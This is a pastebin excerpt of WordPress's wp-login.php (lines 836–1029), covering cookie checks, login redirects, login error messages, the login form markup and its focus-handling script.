  836. if ( empty( $_COOKIE[ LOGGED_IN_COOKIE ] ) ) {
  837. if ( headers_sent() ) {
  838. $user = new WP_Error( 'test_cookie', sprintf( __( '<strong>ERROR</strong>: Cookies are blocked due to unexpected output. For help, please see <a href="%1$s">this documentation</a> or try the <a href="%2$s">support forums</a>.' ),
  839. __( 'https://codex.wordpress.org/Cookies' ), __( 'https://wordpress.org/support/' ) ) );
  840. } elseif ( isset( $_POST['testcookie'] ) && empty( $_COOKIE[ TEST_COOKIE ] ) ) {
  841. // If cookies are disabled we can't log in even with a valid user+pass
  842. $user = new WP_Error( 'test_cookie', sprintf( __( '<strong>ERROR</strong>: Cookies are blocked or not supported by your browser. You must <a href="%s">enable cookies</a> to use WordPress.' ),
  843. __( 'https://codex.wordpress.org/Cookies' ) ) );
  844. }
  845. }
  846.  
  847. $requested_redirect_to = isset( $_REQUEST['redirect_to'] ) ? $_REQUEST['redirect_to'] : '';
  848. /**
  849. * Filters the login redirect URL.
  850. *
  851. * @since 3.0.0
  852. *
  853. * @param string $redirect_to The redirect destination URL.
  854. * @param string $requested_redirect_to The requested redirect destination URL passed as a parameter.
  855. * @param WP_User|WP_Error $user WP_User object if login was successful, WP_Error object otherwise.
  856. */
  857. $redirect_to = apply_filters( 'login_redirect', $redirect_to, $requested_redirect_to, $user );
  858.  
  859. if ( !is_wp_error($user) && !$reauth ) {
  860. if ( $interim_login ) {
  861. $message = '<p class="message">' . __('You have logged in successfully.') . '</p>';
  862. $interim_login = 'success';
  863. login_header( '', $message ); ?>
  864. </div>
  865. <?php
  866. /** This action is documented in wp-login.php */
  867. do_action( 'login_footer' ); ?>
  868. <?php if ( $customize_login ) : ?>
  869. <script type="text/javascript">setTimeout( function(){ new wp.customize.Messenger({ url: '<?php echo wp_customize_url(); ?>', channel: 'login' }).send('login') }, 1000 );</script>
  870. <?php endif; ?>
  871. </body></html>
  872. <?php exit;
  873. }
  874.  
  875. if ( ( empty( $redirect_to ) || $redirect_to == 'wp-admin/' || $redirect_to == admin_url() ) ) {
  876. // If the user doesn't belong to a blog, send them to user admin. If the user can't edit posts, send them to their profile.
  877. if ( is_multisite() && !get_active_blog_for_user($user->ID) && !is_super_admin( $user->ID ) )
  878. $redirect_to = user_admin_url();
  879. elseif ( is_multisite() && !$user->has_cap('read') )
  880. $redirect_to = get_dashboard_url( $user->ID );
  881. elseif ( !$user->has_cap('edit_posts') )
  882. $redirect_to = $user->has_cap( 'read' ) ? admin_url( 'profile.php' ) : home_url();
  883.  
  884. wp_redirect( $redirect_to );
  885. exit();
  886. }
  887. wp_safe_redirect($redirect_to);
  888. exit();
  889. }
  890.  
  891. $errors = $user;
  892. // Clear errors if loggedout is set.
  893. if ( !empty($_GET['loggedout']) || $reauth )
  894. $errors = new WP_Error();
  895.  
  896. if ( $interim_login ) {
  897. if ( ! $errors->get_error_code() )
  898. $errors->add( 'expired', __( 'Your session has expired. Please log in to continue where you left off.' ), 'message' );
  899. } else {
  900. // Some parts of this script use the main login form to display a message
  901. if ( isset($_GET['loggedout']) && true == $_GET['loggedout'] )
  902. $errors->add('loggedout', __('You are now logged out.'), 'message');
  903. elseif ( isset($_GET['registration']) && 'disabled' == $_GET['registration'] )
  904. $errors->add('registerdisabled', __('User registration is currently not allowed.'));
  905. elseif ( isset($_GET['checkemail']) && 'confirm' == $_GET['checkemail'] )
  906. $errors->add('confirm', __('Check your email for the confirmation link.'), 'message');
  907. elseif ( isset($_GET['checkemail']) && 'newpass' == $_GET['checkemail'] )
  908. $errors->add('newpass', __('Check your email for your new password.'), 'message');
  909. elseif ( isset($_GET['checkemail']) && 'registered' == $_GET['checkemail'] )
  910. $errors->add('registered', __('Registration complete. Please check your email.'), 'message');
  911. elseif ( strpos( $redirect_to, 'about.php?updated' ) )
  912. $errors->add('updated', __( '<strong>You have successfully updated WordPress!</strong> Please log back in to see what&#8217;s new.' ), 'message' );
  913. }
  914.  
  915. /**
  916. * Filters the login page errors.
  917. *
  918. * @since 3.6.0
  919. *
  920. * @param object $errors WP Error object.
  921. * @param string $redirect_to Redirect destination URL.
  922. */
  923. $errors = apply_filters( 'wp_login_errors', $errors, $redirect_to );
  924.  
  925. // Clear any stale cookies.
  926. if ( $reauth )
  927. wp_clear_auth_cookie();
  928.  
  929. login_header(__('Log In'), '', $errors);
  930.  
  931. if ( isset($_POST['log']) )
  932. $user_login = ( 'incorrect_password' == $errors->get_error_code() || 'empty_password' == $errors->get_error_code() ) ? esc_attr(wp_unslash($_POST['log'])) : '';
  933. $rememberme = ! empty( $_POST['rememberme'] );
  934.  
  935. if ( ! empty( $errors->errors ) ) {
  936. $aria_describedby_error = ' aria-describedby="login_error"';
  937. } else {
  938. $aria_describedby_error = '';
  939. }
  940. ?>
  941.  
  942. <form name="loginform" id="loginform" action="<?php echo esc_url( site_url( 'wp-login.php', 'login_post' ) ); ?>" method="post">
  943. <p>
  944. <label for="user_login"><?php _e('Username or Email') ?><br />
  945. <input type="text" name="log" id="user_login"<?php echo $aria_describedby_error; ?> class="input" value="<?php echo esc_attr( $user_login ); ?>" size="20" /></label>
  946. </p>
  947. <p>
  948. <label for="user_pass"><?php _e('Password') ?><br />
  949. <input type="password" name="pwd" id="user_pass"<?php echo $aria_describedby_error; ?> class="input" value="" size="20" /></label>
  950. </p>
  951. <?php
  952. /**
  953. * Fires following the 'Password' field in the login form.
  954. *
  955. * @since 2.1.0
  956. */
  957. do_action( 'login_form' );
  958. ?>
  959. <p class="forgetmenot"><label for="rememberme"><input name="rememberme" type="checkbox" id="rememberme" value="forever" <?php checked( $rememberme ); ?> /> <?php esc_attr_e('Remember Me'); ?></label></p>
  960. <p class="submit">
  961. <input type="submit" name="wp-submit" id="wp-submit" class="button button-primary button-large" value="<?php esc_attr_e('Log In'); ?>" />
  962. <?php if ( $interim_login ) { ?>
  963. <input type="hidden" name="interim-login" value="1" />
  964. <?php } else { ?>
  965. <input type="hidden" name="redirect_to" value="<?php echo esc_attr($redirect_to); ?>" />
  966. <?php } ?>
  967. <?php if ( $customize_login ) : ?>
  968. <input type="hidden" name="customize-login" value="1" />
  969. <?php endif; ?>
  970. <input type="hidden" name="testcookie" value="1" />
  971. </p>
  972. </form>
  973.  
  974. <?php if ( ! $interim_login ) { ?>
  975. <p id="nav">
  976. <?php if ( ! isset( $_GET['checkemail'] ) || ! in_array( $_GET['checkemail'], array( 'confirm', 'newpass' ) ) ) :
  977. if ( get_option( 'users_can_register' ) ) :
  978. $registration_url = sprintf( '<a href="%s">%s</a>', esc_url( wp_registration_url() ), __( 'Register' ) );
  979.  
  980. /** This filter is documented in wp-includes/general-template.php */
  981. echo apply_filters( 'register', $registration_url ) . ' | ';
  982. endif;
  983. ?>
  984. <a href="<?php echo esc_url( wp_lostpassword_url() ); ?>"><?php _e( 'Lost your password?' ); ?></a>
  985. <?php endif; ?>
  986. </p>
  987. <?php } ?>
  988.  
  989. <script type="text/javascript">
  990. function wp_attempt_focus(){
  991. setTimeout( function(){ try{
  992. <?php if ( $user_login ) { ?>
  993. d = document.getElementById('user_pass');
  994. d.value = '';
  995. <?php } else { ?>
  996. d = document.getElementById('user_login');
  997. <?php if ( 'invalid_username' == $errors->get_error_code() ) { ?>
  998. if( d.value != '' )
  999. d.value = '';
  1000. <?php
  1001. }
  1002. }?>
  1003. d.focus();
  1004. d.select();
  1005. } catch(e){}
  1006. }, 200);
  1007. }
  1008.  
  1009. <?php if ( !$error ) { ?>
  1010. wp_attempt_focus();
  1011. <?php } ?>
  1012. if(typeof wpOnload=='function')wpOnload();
  1013. <?php if ( $interim_login ) { ?>
  1014. (function(){
  1015. try {
  1016. var i, links = document.getElementsByTagName('a');
  1017. for ( i in links ) {
  1018. if ( links[i].href )
  1019. links[i].target = '_blank';
  1020. }
  1021. } catch(e){}
  1022. }());
  1023. <?php } ?>
  1024. </script>
  1025.  
  1026. <?php
  1027. login_footer();
  1028. break;
  1029. } // end action switch
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement